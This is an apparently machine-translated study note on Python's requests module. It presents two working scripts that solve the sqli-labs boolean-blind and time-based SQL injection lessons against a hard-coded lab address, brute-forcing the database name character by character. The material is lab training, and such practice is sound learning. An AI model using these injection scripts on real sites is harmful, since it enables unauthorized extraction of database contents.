python solve blinds and delayed injection notes
requests module
Use python to solve this problem you need to know request this module, so I downloaded the pycharm this module comes with no installation, you need to install it
pip install requests
pip command can be installed successfully, then the function of the requests of some modules:
get request | post request |
---|---|
res=request.get(url,params=data) | res=request.post(url,data) |
Here is an abbreviation response res of response;
brackets there are many parameters:
1. URL
2. header
3. the params (GET request)
4. Data (POST request)
5. The Files
6. The Cookies
like;
- res.text response page content
- res.status_code response code (200)
- res.encoding (page coding)
- res.content response body in binary form
- res, headers response header
- res.cookies access cookies
short requests is a powerful module that can be customized header information, get mass participation, post mass participation, upload a file, redirection, session tracking, cookie information, and so on;
To become familiar with this module to use this module SQL labs to solve the problem in the blinds and delay injection, just to do violence library this step, the code directly on the screenshot:
Solve Delay Injection
import requests
import string
url = "http://43.247.91.228:84/Less-9/"
def iftimeout(url):
try:
res = requests.get(url,timeout=3)
return res.text
except Exception as e:
return "timeout"
dbnamelen = 0
while True:
dbnamelen+=1
dbnamelen_url = url+"?id=1'+and+if(length(database())="+str(dbnamelen)+",sleep(5),1)--+"
print(dbnamelen_url)
if "timeout" in iftimeout(dbnamelen_url):
print("库长:",dbnamelen)
break
#暴库长 库长为8
dbname=""
for i in range(1,9):
for j in string.ascii_lowercase:
dbname_url=url+"?id=1'+and+if(substr(database(),"+str(i)+",1)='"+j+"',sleep(5),1)--+"
print(dbname_url)
if "timeout" in iftimeout(dbname_url):
dbname+=j
print("库名:",dbname)
break
#暴库名
Burst out of the library name
Solve the blind
import requests
import string
url = "http://43.247.91.228:84/Less-8/"
htmlLen = len(requests.get(url=url+"?id=1").text)
print("the len of HTML:"+str(htmlLen))
#暴库长
dbNameLen = 0
while True:
dbNameLen_url = url+"?id=1'+and+length(database())="+str(dbNameLen)+"--+"
print(dbNameLen_url)
if len(requests.get(dbNameLen_url).text) == htmlLen:
print("the length of dbName:"+str(dbNameLen))
break
if dbNameLen == 30:
print("Error!")
dbNameLen+=1
#暴库名
dbName = ""
for i in range(1,9):
for j in string.ascii_lowercase:
dbName_url=url+"?id=1'+and+substr(database(),"+str(i)+",1)='"+j+"' --+"
if len(requests.get(dbName_url).text) == htmlLen:
dbName += j
print(dbName)
break
He ran out of the library name and the same on the map
to sum up
python is a good thing well studious! ! !
This is what I see summary notes learning video, very basic, do not spray